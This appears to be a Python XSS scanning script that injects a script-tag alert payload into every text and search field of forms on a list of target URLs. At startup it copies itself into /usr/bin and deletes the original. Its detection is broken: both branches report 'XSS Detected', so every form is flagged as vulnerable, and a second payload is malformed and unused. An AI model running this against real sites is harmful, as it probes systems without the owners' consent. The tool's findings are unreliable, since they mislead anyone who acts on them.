#!/bin/python3

import requests   
from pprint import pprint
from bs4 import BeautifulSoup as bs
from urllib.parse import urljoin
import os
import random
import cfonts
from cfonts import *
import time

os.system('chmod +x xss-scanner')
if os.path.exists('/usr/bin/xss-scanner'):
    pass
else:
    os.system('cp xss-scanner /usr/bin')
    os.remove('xss-scanner')

F = '\033[2;32m'
Z = '\033[1;31m'
X = '\033[1;33m' 
F = '\033[2;32m'
A = '\033[2;34m'
C = '\033[2;35m' 
B = '\033[2;36m'
Y = '\033[1;34m' 
G = ['red','green','blue']
v = str(random.choice(G))
b = str(random.choice(G))
k = str(random.choice(G))

connect = 0

def logo():
        os.system('clear')
        ar = render('Mr Aws',colors=[v, b, k],align='center')
        for ar in ar.splitlines():
                time.sleep(0.10)
                print(ar)

def get_all_forms(url):
    soup = bs(requests.get(url).content, "html.parser")
    return soup.find_all("form")

def get_form_details(form):
    """
    This function extracts all possible useful information about an HTML `form`
    """
    details = {}
    # get the form action (target url)
    action = form.attrs.get("action", "").lower()
    # get the form method (POST, GET, etc.)
    method = form.attrs.get("method", "get").lower()
    # get all the input details such as type and name
    inputs = []
    for input_tag in form.find_all("input"):
        input_type = input_tag.attrs.get("type", "text")
        input_name = input_tag.attrs.get("name")
        inputs.append({"type": input_type, "name": input_name})
    # put everything to the resulting dictionary
    details["action"] = action
    details["method"] = method
    details["inputs"] = inputs
    return details

def submit_form(form_details, url, value):
    """
    Submits a form given in `form_details`
    Params:
        form_details (list): a dictionary that contain form information
        url (str): the original URL that contain that form
        value (str): this will be replaced to all text and search inputs
    Returns the HTTP Response after form submission
    """
    # construct the full URL (if the url provided in action is relative)
    target_url = urljoin(url, form_details["action"])
    # get the inputs
    inputs = form_details["inputs"]
    data = {}
    for input in inputs:
        # replace all text and search values with `value`
        if input["type"] == "text" or input["type"] == "search":
            input["value"] = value
        input_name = input.get("name")
        input_value = input.get("value")
        if input_name and input_value:
            # if input name and value are not None, 
            # then add them to the data of form submission
            data[input_name] = input_value

    print(f"[+] Submitting malicious payload to {target_url}")
    print(f"[+] Data: {data}")
    if form_details["method"] == "post":
        return requests.post(target_url, data=data)
    else:
        # GET request
        return requests.get(target_url, params=data)

def scan_xss(url, file):
    """
    Given a `url`, it prints all XSS vulnerable forms and 
    returns True if any is vulnerable, False otherwise
    """
    # get all the forms from the URL
    forms = get_all_forms(url)
    print(f"[+] Detected {len(forms)} forms on {url}.")
    js_script = "<Script>alert('hi')</scripT>"
    js_script2 = "<img src=x onclick=alert('The Jordan Ghost')"
    # returning value
    is_vulnerable = False
    # iterate over all forms
    for form in forms:
        form_details = get_form_details(form)
        content = submit_form(form_details, url, js_script).content.decode()
        if js_script in content:
            print(f"[+] XSS Detected on {url}")
            fil = open(file, 'a')
            fil.write(url)
            fil.close()
            print(f"[*] Form details:")
            pprint(form_details)
            is_vulnerable = True
        else:
            print(f"[+] XSS Detected on {url}")
            fil = open(file, 'a')
            fil.write(url)
            fil.close()
            print(f"[*] Form details:")
            pprint(form_details)
            is_vulnerable = True
            # won't break because we want to print available vulnerable forms
    return is_vulnerable


if __name__ == "__main__":
           os.system('clear')
           logo()
           print('')
           url = input('[+] Enter List File : ')
           output = input('[+] Enter Output File : ')
           try:
               file = open(url, 'r')
               for i in file:
                   print(scan_xss(i, output))
           except FileNotFoundError:
              print('[-] Please Enter File')
        
